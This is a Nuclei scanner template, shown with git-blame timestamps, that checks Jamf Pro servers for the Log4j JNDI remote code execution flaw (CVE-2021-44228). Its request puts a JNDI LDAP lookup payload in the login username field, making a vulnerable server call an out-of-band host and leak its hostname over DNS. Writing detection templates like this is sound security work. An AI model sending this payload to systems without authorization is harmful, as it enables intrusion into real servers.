nuclei-templates/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml

75 lines
2.3 KiB
YAML
Raw Permalink Normal View History

2022-10-21 08:29:33 +00:00
id: jamf-pro-log4j-rce
info:
name: JamF Pro - Remote Code Execution (Apache Log4j)
author: DhiyaneshDK,pdteam
severity: critical
description: |
JamF is susceptible to Lof4j JNDI remote code execution. JamF is the industry standard when it comes to the management of iOS devices (iPhones and iPads), macOS computers (MacBooks, iMacs, etc.), and tvOS devices (Apple TV).
reference:
- https://github.com/random-robbie/jamf-log4j
- https://docs.jamf.com/technical-articles/Mitigating_the_Apache_Log4j_2_Vulnerability.html
- https://community.connection.com/what-is-jamf/
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
2022-10-25 13:40:49 +00:00
cwe-id: CWE-77
2022-10-21 08:29:33 +00:00
metadata:
2023-10-14 11:27:55 +00:00
verified: true
max-request: 1
2022-10-21 08:29:33 +00:00
shodan-query: title:"Jamf Pro"
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
2023-05-03 17:51:44 +00:00
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
2022-10-21 08:29:33 +00:00
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
2023-05-08 05:37:00 +00:00
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
2022-10-21 08:29:33 +00:00
matchers-condition: and
matchers:
- type: word
2023-11-17 08:48:58 +00:00
part: body
2022-10-21 08:29:33 +00:00
words:
2023-11-17 08:48:58 +00:00
- "<title>Jamf Pro Login</title>"
2022-10-21 08:29:33 +00:00
- type: word
2023-11-17 08:48:58 +00:00
part: interactsh_protocol # Confirms the DNS Interaction
2022-10-21 08:29:33 +00:00
words:
2023-11-17 08:48:58 +00:00
- "dns"
2022-10-21 08:29:33 +00:00
2023-05-03 17:51:44 +00:00
- type: regex
part: interactsh_request
regex:
2023-11-17 08:48:58 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
2023-05-03 17:51:44 +00:00
2022-10-21 08:29:33 +00:00
extractors:
2023-05-08 05:37:00 +00:00
- type: kval
kval:
2023-11-17 08:48:58 +00:00
- interactsh_ip
2023-05-08 05:37:00 +00:00
- type: regex
2023-11-17 08:48:58 +00:00
part: interactsh_request
2023-05-08 05:37:00 +00:00
group: 2
regex:
2023-11-17 08:48:58 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
2023-05-08 05:37:00 +00:00
2022-10-21 08:29:33 +00:00
- type: regex
2023-11-17 08:48:58 +00:00
part: interactsh_request
2022-10-21 08:29:33 +00:00
group: 1
regex:
2023-11-17 08:48:58 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
# digest: 4b0a00483046022100ef80a2e9d710307dc33ce06f7c012d5381ae2ca17d26f387b0485a6e2cce91790221009cb0b487e4ed5e81dfd9a55d4059624d37f20bd5f3f573b9e17e2d7379137f1d:922c64590222798bb761d5b6d8e72950